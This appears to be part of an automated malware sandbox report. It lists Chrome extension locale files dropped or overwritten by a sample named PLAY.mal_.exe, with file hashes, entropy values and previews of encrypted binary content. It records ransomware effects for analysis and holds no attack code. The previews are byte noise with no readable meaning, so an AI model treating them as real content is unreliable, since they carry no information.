        Preview:...>..[."..".....cQ...Xk#..cX..B.....+...Ws5.kg......Q...ThH.d....!.F..5..c....k..`.1..i.j...\P]...(./..'.n.35.]...8.1<.~....Lk...g:...=`.!......-Fs..n{.TA.dY.%%0.^.......9.W..^d.4*..>r.}E.Zj.%..../Nu ........Z... ,..D.....%.b.w..64...K...f+....}I...d(w._...0.9.b.J...&..e....qZ.}..-.....L.....Q.p.pIC..Q..bg...v...fq..`.A....*..8.....W....B...!X..$.3..G.}v.)...aX.p..I#|...^..y..v.W....<.b...U=!....-P.z9.G.e..<J...jwC.zO.._R..N.E......*..4.pH.`..I...+..[..T....kzWd...-.@.......b.\.i.$..6....".......,.!.>=.V$.G..I.w.XS..f..vDp.1.......,?i8.CG.6sU..F...&.{..q.-..8d.X.{p......X....+.....*.i..9..TR.".w.m.4.._a."i../{_...z@Qz.!^.@g.l...;R._.......n.$..~..s.p..h..3.l'bP.....5H...B..n..P.;.).....J....c.HT..e..Z...W..|."Uv>...}&.8.(#...RS...sc.d..u-.d.....GV.....dR....O.U..^.......J...=....%.......lm...G.%...B..f.b.zt...ab#l.1.A.O..0I'.....DZ...*7.....5...F..b...T..U.|.!.I>............................~..H....,z`....[Y.I-...kSs"..I.?...S...."..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\iw\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3304
        Entropy (8bit):7.932426397251443
        Encrypted:false
        SSDEEP:
        MD5:C41A9F0CD99241710B3E3BDC28118CB0
        SHA1:A0315DBDCE7A31E7E834A6CAC39248DBC6CA4390
        SHA-256:F368A7BDB2175D9225A1EF19EA39F6FA0DE5DCB4D27FA2A52F52DE74187B1E54
        SHA-512:7CA978692DEDFE7B19435575B9DFDA039F4F7A58AF8377FAB7A8E10F3B6F56C3FAC044DA729510E9635E6333938AE171204A585BEB49C80BAEABEA23482BEA04
        Malicious:false
        Preview:..QsM.....O.....)J.>b.....bl..]Qau.$.`...I.+.<4#...<..wC...@.....R...K.Z-.4........W..t.e.^.../.....g=&..w.q.W.'n....we.y.b......b...PY...TU....'3.H..[..u.3D.a..5.:....E.~....cK..=..A.8.........\.vn..5....}W.-d.R.L.*...WU..n...C..5.....d.5.........p.|...,Y.......4....Z.u...[.D.!N..a..#t...C.qEi.z.....&n..."....y.....f....:...I..!.......H*6.R..m.Y.f(...i5...I..4A..C.....:9oC..,(|[d7g.....]>s<y.r.8.....f....-.C...6#...s...u.2.D.t...#..I...... ......t3.ODwq.Q.:..../`..2..}........c/nF.....r9@..4.S...n.ZM.6...\~1k).\._@q........#...+..$b....mac:8.r.[yp.}a...6T..d...l.a.1jS......}Q....#".1`.*vw..L.<.?|<.I..L0i<......3.&.9,g...*.t.~.~..um....0...b1.>Um/...t"...]m<....S..L.}Us."......%...d.p...C.H..4B4$.t..~-.e.g....q..nY..X...VA..E.l....U.I.3 ....s.|.Rc.4.s...D.....N*D..\6;......8P,&....$v.O.K...k.r.Ll..9=....../z.....#N..\k|J.."..'fD).5.bK.J.h.YF........7..I....}....P..9..K..>....^..w.".....AO...-..z..tc..cD.....8.....[..&V...#...bd...q+...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ja\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2232
        Entropy (8bit):7.905948660279689
        Encrypted:false
        SSDEEP:
        MD5:BF35DEE366DAE8D739E224131555AE78
        SHA1:E8AB0D917F34C20CA1B979A7C9DEC687C0B653CF
        SHA-256:25601F8E690DF85BFBD3776CD1BB367ADD9B7C42F5E14BFDA1B1231DE5AB9FE5
        SHA-512:23B8EAB04BECE31368E9674BB21C812DB8942D6E9B2B02DDB07A00A0C68B8960F0CB03033DC4CFB69A5FBDC6727E67CF0BCD0E9B82474D04BD8BF557AC69CD40
        Malicious:false
        Preview:...+&u....ZE.$.SN}......3.>a.@....(..y..1yq$.2C..p[c...U.B..{....*...*.<k.<i.r..g0....e..0...v.U..y.o..&^..x.s..yK..J#.....-.7...h/.K.............9...p...M.f4.]Q$t..........~.*.=.Z74..\....6!...fP*....i"....!.'...<.....V..'.... ~..q.ElGR.D...X..............u...,.........h.Vn8.I..9v._..$..)u.._.Lob.1t1..|..J*<#..Uv.Q..@".X.h.....wu.[.s...y...u..V.....*......EA..K..[...6#x-.}.V...:.ta...u.........fh..u...k+....n.j...#....`...J.....:$.o.e"#..%........0..c).*{3eL6........C`..5....".D..^W....#w..b...dv.)]'....k.X.\/]..K..V2A....E.m.j~h....[..@g..d..E_..%..K.PL.1.~.........G<.'..d...s.qx..>......6..`s..eO....G...9......'..5...6.`f.i.2....f...[.U...i8xj..@..U...+v.)f...S..w....!..0P.U....W..m+u.nO.l...`.6..XL0P..N.......U....V/..=g3$&...F.^`9./My_p.............9..,.28|f..v...B1..+.g-?..g....,.n...C..iP...b8.T].B_>n...Z.*..pG.K...(.xZ..l...0.F..R.bc".G.&....J.....6.....m.Z..+_......Mb/....VT...@F.x...i....01'C...w.*...m.....B..x.&.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ka\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4344
        Entropy (8bit):7.962201497216656
        Encrypted:false
        SSDEEP:
        MD5:D2745318AD2FC98795E0D2A1B394E643
        SHA1:7A732AEA01006EFC98D016F00C0705AE28F91428
        SHA-256:402C9EE142DACAD28A42FE0B3D9F1AFF5BB18E1D3B69FEB8EB179DA0C5FD11F3
        SHA-512:6EEB6E4BBA9C6677D6D241248B1441B8FEB06216D8EF07CBCF3A7ACCAA6B042D169938FBAFC41895826F8CA0F28AB1699605137862DCAC509A474694B3BD9F0E
        Malicious:false
        Preview:.....k.6...P..l... }...Jk.$...bT....v)xyji..>;.....<q..q.......!F.....8...e\....Ka..L..z.n6....5@.......2..j%....u...f.K.....V...f.x.$\6...3..:.~.6.u..O.D......iv.`.......d...\..\.`....."........U....2'h..oHn..o../$..O.r.....}T...\.R%U.H...l...0.g.].5Z..T1....2*.X4.o...MF..8.X..K.5NzE...L7..S...F..#.2.2+E....C.96....RnS].6.z^Y...U.\..2(pM.;.sk.:.tW.....1.Pu.......J.....}p..}y+..7...f`t.#E...+.6\.|....MxS.}.k-....0p~..8.I3.rn....k............w..R3d...c......wPa'..q........`...Z...g...J9?..T'..T..|..|`...R.4..r......+t... ..#.K..WGp..8..o*.M....Y.v..z.../,y...V.......6..I..2X..EH...|....c.IH.G.&aKou..oPC..~=...0..d.;..._....eH4...r-..L.#.....C.. ..,....8..L.....4.....R....i!. .>.sD....</\H.Sm.;.=....A.a.......v1...y&..K,#..2ta..s.....?.7....X...K..w..z.HK....@.9.3.y.S....`. .\...S....U9..1.$.N..2.....j.-e(...p..(H`....8.s.".ag...9&..!...P.@......}.(Aw.=.[......,T1.Fj.} /...en\.H..6...S.c?.i..N.g..K.._.5.[t....|.....x.6.P..:.?KM$E

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kk\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4312
        Entropy (8bit):7.954856714480404
        Encrypted:false
        SSDEEP:
        MD5:D68DCD136FC4B1F8783402CC4BA4F8B7
        SHA1:7FC0EC24379798850BBE67B24E76CF50D604D65E
        SHA-256:A7115FF2217EBBDE9782C99F01D409672EE0484AF4B9222CE57E8C5DA40327F5
        SHA-512:B166A999EEC9AF55BC4ED56635476F409646E277D2A0D78393DD325777F60036A8D936C098D66EE6E19789AA42CD6CAE4C60AB70463B28B5B056473C9B6E8E32
        Malicious:false
        Preview:#.?|.%b...%.?.,.....[.K.+..bRs....%.DF8.Y.].6p.o)D0>j.h....:_..n....?.K.......FL...O.E.`..f.pO.bh.!."...o".....r...u.m.....3.]D."..|....N....(....d...*....t..Hi..B.&.0.;:...nZ.j......6...`....m..G.....G..j.X.......l........3....q..A..k..5x..2oEgmy...,h....3..#qB..%......X..s%fG.`..... H.Q/........#..b.P(<..7...W...^.........J....1.....v..M...d.;.,GZ..y..gPe.7s...;X..(M..pY....f.P..p...lT.,dqOh.\...hs5..u..ukH......f_.Q<n.....L...A.I..mH....T.zi..PgQa.(./.'..3.....y`......`........g.,..K...}...d.O..)... ..L......g.x.Bgc*8...|.....b&......f^.y....ks7...}.T...fP....#C...$...&..q3B.V/a.....SG.......h.9..$.2...^..j.aT.$..;h.x7C6GN..W3.`....Na~.z..u...1G....q........|..c3...d.J.yz9u......y..jfZ3....>*...s....m.i.L..i.Qr.v............o........./r{..O+......Wtw.>!.])...;..I.w.P..Ph.@>Y.{.......~....5....V.u.......(....-.1...de.[.^...8.mp....G_...5F..q..........+..~...Z..V....5..;&z..B...*6........p...8sM..h.%l.k.."u^"....u|Y..D.......6]Ot..U.._!...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\km\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4200
        Entropy (8bit):7.952603606719502
        Encrypted:false
        SSDEEP:
        MD5:4028BE6836A573A3C7EA69B83310DEB4
        SHA1:E1E622A75C2AE0BA8BD12BBA4FF3E86B6287C007
        SHA-256:3FB7F59764709C00BC792A4EB1FC737E0291A72DBB43D157E645B39E8BB54B96
        SHA-512:807D6B51D11F92B0154CC13B652144793C9F2F0845B7D53784B7CB35720CC1AB42BE2B31D9E3CD00B71A78D414F62A6BCB4DAAF94D50F6D0A29CEB1F77CAE2BF
        Malicious:false
        Preview:O..H.....v.#../.).fL....K]Q..;!.#.R..)N....4 ..%8e..%%.?...G.sN.5.T..B..cq..w.Y.......].=Tu..&.....1.....~.i...Q.......W........p.'....nu...%.e?.f.."...]"...../f....%...B.z.....McZ..t..C2..$_h.J..@J...:.t..18...o.b..M..c..Y..].T.9R..Y....N.E....]&d...f(....*...[.n...A.2.q......s.].G2Y..8.H.O.W.;j..._...f*..s%6...`..dax..^o..d-....9...._..Y.r.2..93..;np......S..s.4Bx.cn+..Myx.V.S\;....^..!.r.... ..7m.t.......I<.~oL.......=.A.#zU%!5..;....~...t.T^+.u)..y@j...R.......E.p.!..f#......U.|*B.Q.E>."..>.X1.4.\$.L/...r....h...m..._.b....E.e.-5f....#6.Z._bd|.ll....K.......U...z.2..H...j|S.q.Z=..9...S..^Uc...:.t..."Fp.k...{iw}...Q....U..@P..'...ZM... _i.<x._.w.......g..'l.0.).F..H...].S'.h..9K]...|;e..^.m..C.H...]t........y.y<o.....@f.$E.E.kB..r..|.....E9o.......?.i...... ...e.I..m.l.T.v...(i..9..(..Jz...I...r..j.?.....^.u.%'.z..HJY$..~...3 .wv.L.3..0.6...{....>Z'..i_...2F?0R...5.t^..N.6l~.>.../+....J..s..4.p...l..34..d....../t.zQ......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\kn\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2952
        Entropy (8bit):7.938491002420368
        Encrypted:false
        SSDEEP:
        MD5:6830F16C96EDABF0F71A9C0D581CDFD0
        SHA1:5C50BAD36FDACFA18EDC3987F813D8156333FB0D
        SHA-256:9EF47859FBBF9A2E85734E2AF2A784813283FFC23194B2C4FDEF59184F4FD708
        SHA-512:4D46D0A5A3525B63C0582F8DC5B67A18C65C9E2828BD4B18602DEE9B24F15F5715020B2ABACB4FC7EF174E79BC229937E8E3080F7463B9E1DC637B09F3F9E192
        Malicious:false
        Preview:._.8......4..~....f.q.'....9..N.)..5`....;D^)G7....H....]L.D.x.C..q.bF..x...q.....-.u.P:.../5....V'z.~!P.5.&UdH...:.{...Z..n7.xi4%...*.7(=#.........e.#;.E.w......6..4".y.N...^}..M...g..a..e.e...0. .=.au....@.@R..L.l.p...Y....B!.EH_.....'..9iCW5...I..nF/......K9.w....:.....@......0l.s......C....)......V`.D.`/..o. ....Y............Z..X.Qs...........%\.l...m.yQ*6:.u|..d.b.|>...c.q.K.....XF.8F...G....v..'.~*>..>.@...3[.....=......E,.....0..jU.Un$h.O.I[..}..?..hX.J...-.d.B.MLe.y.,...X.HH5c......x1.B..#g._a...?..Q4..`.R.|.~*f........x*....;5W....h...f.~.....3......&P...G..g.X..=...)9.....+.,.t..H.....R.1H.|/$.........9.QJg."^.....V.K..b.....0...'F`...D<i..."....{y.d.q.=.t\,...W..$...0...D......w........a.XSS..BCr..0....Ne.M.....J.~.".M?q..o....s..1....<.-...6%'..........5..%.......d.R...Ql..v.n.QT..z......(.)f.>.h.o..u..4..{|..S.].u.3p.....Ms...z..&......X)Gi.y6 ,N.Hj.P..,..%.6..+......t...h.^..e.i.3..9..SL.~R/ .H..5.v.....6'...-.K).e5..o.w...M.r.N

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ko\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2120
        Entropy (8bit):7.876707119840989
        Encrypted:false
        SSDEEP:
        MD5:A3402C343F74CC1CBC631134F464256D
        SHA1:1BC3CAD8D04B091447C4E57515F9D2630B789411
        SHA-256:F6D1C87457917C192B9E5ED0ABFF5387E00C665D506C36C88DC60F1FD1DA3558
        SHA-512:B184165E2352F16EC60CCCFBE0C8709C6F2266F32B9E41746F61AE0A5FE8FC46CD146D1E4851CEF448F90F593B1E56E557CD2CDF7CC13B5AB059232524ADD964
        Malicious:false
        Preview:$*.D..n.S:..s........r,Y`.SP|...U.+....9.P..b...mS.g..A.....RvB....J..Q.w.Z.(..W..o.y..;....Z..u..f..1..}..4.Q..[...,..!.b.g.}...";.....W..hC.~.P...U..+u.k.....f.Y.5<...3...$j.67.......&..\..p....AL.O .#........7.4..6......<...F.o.-.....;..e.(fg....6. .X_e.Ri.U#&.....4U..:.R.H$.w.GW..]./...Rzk..|.8c.j...+U9.........a:M)c>m.(U./0...I...l~...`:..DZ...{....t.b..."u$....9...^.Z..`o....e...|...*NXTp.Z..N=.....-...'a.^......E..Fy.,..S^)\.X..|.E.....*.....5...}<.~.pnt:Q>.`c.....#.:..).J...7.4.k..I.i:.;{.,t...i..2.D:.7..$.....c+..*.uN....t!.C.E...xi.%.7.vznWk.k........(.;..0...9.{..Z...KxJs4.rJ..;..L.\.XbLqzaja.8.q}...{...{.....$....9.E.m.h.]T...H.S.}.s.....Q....x.D.....C#u......Q.{S....gD.M......._.....t....j....)..0.a.6.}X...s35.s9.H..&....-B) ...~=.h'S9S.!0D.mE5w..2.6..w).*....T......)...0.../]g....rs.~7. ..`.l...H.Q.S.H.1.N..E...j.#.....R..hn.V..M....'1m.&..hl..Q.,.....>.K.C<....v.p...o.%..Xt.-](.5.<..g..7.BS'...D.b.........?Ku.o].jN:y.axN...t

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lo\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3608
        Entropy (8bit):7.945475736272819
        Encrypted:false
        SSDEEP:
        MD5:D07EEB39514125CD5581E851C53A8279
        SHA1:4827A43FA8EC78BD360EE3A207680ABD5C759FD3
        SHA-256:F150026AB773FCDD0831CFFCB0B23BD7648C27E5C82845E2927535C199A90C77
        SHA-512:F3E735A11B52C76C8BF49155E03DFBBEE7F350CD816A2E62356F18117FF9892016A8C7C183FFA46F3DF8F61CFBB51E9732C8DC93C9244346C916092AFCD7EF14
        Malicious:false
        Preview:o..1........T1.]... .....J....U...N...T"..z..c..?.D....9.?W...u}w.MC.....f..)..K...h.Z...&.M...6...1/.%....Gj........|.3.s....c`.-..k]..|/...`..../.pM.V........I..<.7.n....?.v..&..=\...r..m.....f$&..\Vb.=..r.^..x..o#.{$..*.AT..zr...L.cj.|.*.:.l'..<.....}j5t.?q.>a2.X=W..G....'].e=>..3.9.\.t...'.z..q.}..[.L,.Wbl.p..IT..Jk..}r...R3...*..a#d.....b_|.k.<.(.j^$C._...h.t.b.../1N...y.]J.....r/i.tO..O.......u.1&Y$K.z.9F..z[i..S0Y0.<........0.._..#:......J...._.....$.^...h./..E>;\....d....\.....N..e8N..~..,.gG.].;`......i;'.=.......K.S.....^.x\]N..s.q.....D....<..%..v.jS3.f.h+2o....G^h..J..|.n9...aVj?H.*.srq].N6....o..).R..>).....c< m....\<.$L=s...3.T..W9Y...%.....(p..V...S.eT...E.;....U..s......TOG...f....{......'.r+...I9l.<x_-e..v.v;....S.%.G......`,.PT...X...ta[........J..S...8..&]d(.c..w.I..U.0..(.].X..A3.>...e.w...G........jvG....)n...fZ;..4.#....}.9m?.....&......5..........&.Vj....2T...6$.o.i4.-.(...&..#F.Y..R....L...2..HUe]..9.n........S]...k

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lt\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2104
        Entropy (8bit):7.916025845898411
        Encrypted:false
        SSDEEP:
        MD5:5B768613226B8ACACA322B64175FF1A7
        SHA1:025DFB3F26DBF2453E0658AA62A587B5C752CB09
        SHA-256:682EB4FA2EF9D306F2F19830208C303B19CA107A8D86135D186A220CDB83A306
        SHA-512:88FA7756EEAE36464E15BD5647F0B20A80F98AF3CB0E9AB2185C51E45DC8E566DC49E6F19DD9857F24A174789B2B8319E668FD2FE32E6BBC11BB099F25D6CE3C
        Malicious:false
        Preview:..D..R.M.g...;7..C.^.L$.......9.x.....r.EA.[{.Y7.j.{..nD.-".n.oh..i.K..O....a3.....C.4|...4.Q].s.H..F...%p...*9..A.....I.&.`..a1.../.....C..L.....2..R....7\N....l.9..a` >....p.A.+..8.H....4W}:..Vs.... i..."...Y.G.h......*..c.&.......BL./\.{H...IC%....Z..m.3?y....9.C....A...i6.$<.....x..c[g.xo...a..f .~wG......^4....1r#....u....3......97...Ua8....?.s.$.}Q....}......VPn...S.2..?_yXL..7`....l..qH[R..?..Z_j._.1w.....ESy~.F..3V..W[..[.\*.l.....MAro.T..Z=..^+.V..O..1.&w.Ik.....,/.j^..,4Z...z..>.&r3.qU...Qn.y!..o.....&2.S..)Z........c...{.c..2...+./..2.*.P...!bF....).;U.Td.1j.....p]..,.,r."1Y..t....(..i |R..9...EfV....j...C.=C`.Q.r.....XSY..&.S0~.o.qK..tZ......-.....D..x..e........E..v.#.... ......{D.;%......C.~..v...;......u...Sj...t=v(o"...p..\..)dx.y...a.Fsg.5.I.`.A.....DZ......Tn^.../....#...*@`on`M....a"..{.Ym.O#JR|..:('......6.....;.s ..|..Vc;:7......}<m..0.~..%...iR|S..6..1Nb...Q.t....G...X.7........cb......_....@.I_.p+. ....6.u..g...?

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\lv\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2072
        Entropy (8bit):7.892422256302915
        Encrypted:false
        SSDEEP:
        MD5:452F28ADCE412185ED8753DE2C74D4CE
        SHA1:92922EE14068EB0406983D88090E0A988F4ECA40
        SHA-256:11FEC385AC6C2F99F56747B21A5C424687A6023A0DE79A9D3C4FA625EF89753E
        SHA-512:0FCA1CB2DD057111D9C1352C382BE6B80E80B00004D967CF3C5D54956DE82E7269D1891859EE1F2489629B02143270E55AE3D30520B49D26C7C7A0F4B37242AE
        Malicious:false
        Preview:}.y.......J..n.*5.!"V.......$Y.[...Q...|$p.*..oG..Nu9........1+#0.O{1....hS.1zr...:..{.......O)BJ;0.*.."..N.X"`Z4.{.,[.!/..[4._..].q..]{%...r..A.?.SCV.^...........y...,..._L...L.c.,c.!.c.}.a....|......C.....n;....G.K...Z.z.dH........ .....pi5......m$.X.o.8.#0.s.n.....M.......Zj...?...Y..>..f.b...a04...I..$.....FWV...o2....9..;.<.......4.7T..;......x..{..w...5.<.n-.^..n..`._..#...Aem...u._@...../C...kId..."..?;..pp..w......ojb...w.yu..1....x.U.iDh..2.....$...... .`h....8....7..o.$qW.f.Y%z..bX....a.S.&.<wQ...]..9...........G........r/:...|..O\.......7...dM9.f.>R.. "Qw..~U.....(K=..........Um.ok.....^.53...Bb(.>.&...*?.]P5........^.D.L...M..I..$}...r...7J.q{.9.K{@._..f.i..U.S.$...O.....x&.#xd..|sF....z......j$n.:...*/.A,V.}.9rDa&'...nm..*.K...5S.F...Z`B....K].@.c@.....s...6z......*.{...j.Pn..x~....f.L........>V.a..;UZ8:.q..vTc.kr{UG.GTe1....Kr....o^t..,.J.@.bx.<.[...*...R8...@W..X._"......./N.r..v....JB^T...=..,\Z..5..O..h..T9....H

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ml\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3176
        Entropy (8bit):7.931082980825446
        Encrypted:false
        SSDEEP:
        MD5:11728CA46C3E2911D4DC11B118DC2215
        SHA1:63036BF4C151B5D1E2D439EACE6D78B3A73F9C55
        SHA-256:27F24D2CC5AD6BDF2A61FCF7CF653251874C2E2D92109565E032C6A5D52509B9
        SHA-512:DDA92CC972F7F37CBD525583D270D45CE148FC26966186ED423A3ACE4004F145FE5F5E1DCD1DA249A8703BE9BEA95D5102A75840492AEB73B9402C68FFC3F4BA
        Malicious:false
        Preview:K'{.@..:....yG.Len.j..}QM...X.........9y8.|\.$...%[@..e..l..4..B.$...........{i.u.r..pn..>Lhh.8+..9.vW...&W'..O?-s...U(GG..$;....w.V_L5k.Z.tg..d..."$1.t.N..i..E.So.,m....5v.11...Zb..A......V..P .>...m.....x.e..#...eS.Y.l..a...YmoO.p.{...Rn...U.#N..9....6.....xy.....Q...J...q.y.....qd&..O.b..I.q.'..........s.....H.b........g...j.....F.Kl.%n..7..A.A.=......8.....{i.q....m.<. .G...n..r-;...n#,..{..P.&T].....qR7.O3..Y...[o.....Lz..#..A.^(.n..a%.....*......B.Ql...........nV.G."i...`...<....U..`.....fa7..E.v..,....{m....]....3..$..J.L..U.v-..vAB[....j.9...$....m.K....6...K.u=.Hy...$2a..n.[n.....8^.....*..S...+....h...2...Q...Tq.0p.f..-...._.d.[@...9.TtH.Kdr.f ....@.X.7?.T.8......wf.n.&...._......n..d..+...]{?.j.A.W.~.j\..h.]2|.|.*`..".)..6.4h.%..m...n.....EzX..s...\..........6..$....n..../FFNC ..|1&Eo..8..L...I.R*.8......U<..9.....i9^.zq.7..E.)..*..97.'....;(..6\?.j..|.y-i..Y........u..:9.;...J...f.sI..K..t.Gu....=..q.6.".... ."Z_.I7.{..S.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\mn\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3848
        Entropy (8bit):7.946588605766772
        Encrypted:false
        SSDEEP:
        MD5:0160B1BD6C6A2F55D814E7F3F951D9FE
        SHA1:402A0A5351583F533E6E823F6BD9D395177275C8
        SHA-256:9C526060342400CBBEE656CD7D03784B0EB9030177298C050674BE11F89952AF
        SHA-512:0D7740E139EA102FFA638C1010BB73CE044C7E4D6D2F836A249008B5F03D352B613FFB2B44FB3A40305E9F19EF26E1AA6BF98EDE6CF60D77B103EEF2821921FF
        Malicious:false
        Preview:.x.y9...LQ|.MA...cP..Rff.+..ZE..G....o.yt...6.6.....D.dl..[.........zRX.n.KD#..S..O.(j..E.a&......A.j.4...,u.`.d<...k.B.......6....bj..2d..D...\...V.];DJ......HQ5'8.e./6.......Z.CF....f$+.nl(F.......Ig......#*5.f...V.JH..5QC......C./.~....6k....`...$..rR%......c<.....DG.....f....g....x...d.z...U..>a..-...1..i;+.o[.../5G....xk....O.@J+..2mq.m.&AY.K}h..Cz..aX"...-....iO5...L..r.=....:........|.....uqk..s.m.......\x"g.....yNNG.vs*....~R..G..@Tm.H..@h.......@wV7.A....*.k.....3...5.P......;dD.h.s..~.q.7e........'pu...&.%;...IiS.D...w...4....u..P....-....:^..h.{.).K.;..../.2X..[.0.....$3..a .<.U|./c..\N%P....B...}R.....JO....;=.$.2.2.J...q.5H...].7.a......o..tq.d..>..L.m6`$...E..Y..w......h.R..I<f..TW....W3@EQ....g.h.g5.](W..+....I>.....sk.{..I.:.;d...t{.J..9..5..l...#4.Yy:..F$1.l...s.1-.h_.9'...`V....Ig P.B;.r.....[.......e..X.!....U..!..7......f.0...M.2...U.J..~(U3....:q.>.N.@#0.......'I.>..<e.S..~.....i0.fCln..../...+JP...x.....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\mr\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2808
        Entropy (8bit):7.924102756491325
        Encrypted:false
        SSDEEP:
        MD5:4EA616F8150D99E80BB06463BC607FE8
        SHA1:D294C73402B3EEC0B5E47C541F6C22B8CE28F037
        SHA-256:58BDB61C3BCFFF56C26FC2D620204D18C26365165FE83325D94FA98B44C6BF4B
        SHA-512:229FB3B5F85EE201153498CFEB389A6A392B6F8D8802A84B915DA326DA3FA439C0802DA5DDFC6369AB140F90CEA29F4E2C4AB841362A835BA98D6B7DC78A889E
        Malicious:false
        Preview:.x.?..]..l.o....a.Md?_&.;#......J."K....$.F..[1H.ip.....`...z..VO......Mw.....hBI...+CJ".....|...h-g.`y..m/..F).._]7.U./.4.].1.;@....'......_..a..6.h.R..Ft."..bz.b...|b_.....J.0.....h:..av.|.J;P.G.....#..)6*.X..9 1........!.'.6.dqA.ZR....1..W.8.c.].1=......H....@.[^~:.T.0o.....z..*.~n.@.1..v..U...}...JE.=....|....jn.:.#.....h..2..P(.Y.>?.5.*.E}.z..Eu.nc..>..Z.G.<......5.......(...g.4..(P.......p...}v....:..7n=J6s.ha..{..`FS..~^.973{j.....cTzL....m..M.a..k..Ve.~.u.?..(..?.L...........5.7..<XD.A.....5......oY''..}.*.H..a.RQ.8...J.e".w..,.pS3.$.7......<,..X,@v... ..4C.o.F.yQm{.Z.'..~.T........6..2K.4r.8.mm3.....d.Gp...r9.:.zl.L..8h.|.4...I+n&.IQ....V.>U..h.....'......"^......^.e*...w..#.n'9.0.......{L\.:.-....x..p.........-.....h/a..9.....J..$.O+e.........FK......B.:*7...Lz.e..a..p.@>?...s.N....._q.K.*.gM....=.n..]..'.i1.>7M.P...(..}......r.S.~Sc......LF.w...=2....DA.-.g1..w.G.m... .^|J#L.......>...C"..w.)y .#..O.n....l.w.-...A....s..7..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ms\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.883612418235446
        Encrypted:false
        SSDEEP:
        MD5:2A12CC48E5C674431DF6AB531FFE17DE
        SHA1:8D1A4CCA768B30B3B479C5E92AE4747C28E92D89
        SHA-256:B2C9561EF73F3FA178522EA79EFFC0F7EBF9DC1B2C731EF04A3C69F388A57FD0
        SHA-512:FA4A3456CEC6ADD79B3C2717A70C9E55883718F0CB40BEF0963A2E0473FDDA01BF8E1DF43E054DDE69346477BC4C66FC52DF7B809CE431E1063BA82FE2C81EB6
        Malicious:false
        Preview:...Q. .....}9c..-:..S.Tn`/6W..B.CG..g..j9E/..P.f..1Y..C....b7.U.)!..<z)@.....e..>l........K.....M.pX....|.7l.m.Z....X.y\.^.....Ip....m.8...0.m.....hJ.#..{o......s~C...%.....E..z4...u.6Iu...M....4A.Qe....i...)..l.-....M.T....>.{UNP.zz.......6..=...g..X.5AP[.vD.6.......}...#..D.(.(.J|}H(.XV}R.._5....0....V\.4g....bnt.SB.7.....r6....}.....{...v...`..v"F..:.*oF.Q...zM`.<.:.T..N.n.Y..w.z.1E..N.....!...|x...G_8...7A.>.b.!u*0.k..:9u..M.."(.....S....~....5....h.j....`...-..`..[.3.g.Y./..'_.01..Qh..ou/-..Z6?...[.........(..Z..........u.u~d1.....i..p....#....4#;R........B7.&0....X..R......[T..E.t..n}(yO.,$X6..";)f....P......^...&.^......Q..-....}...!G..|x:..Z../......LY....A.x.G0..q<.%I..a..GO...GQ-m.~.\......MD.....T...;4......`.U.......`;..[..qQ. 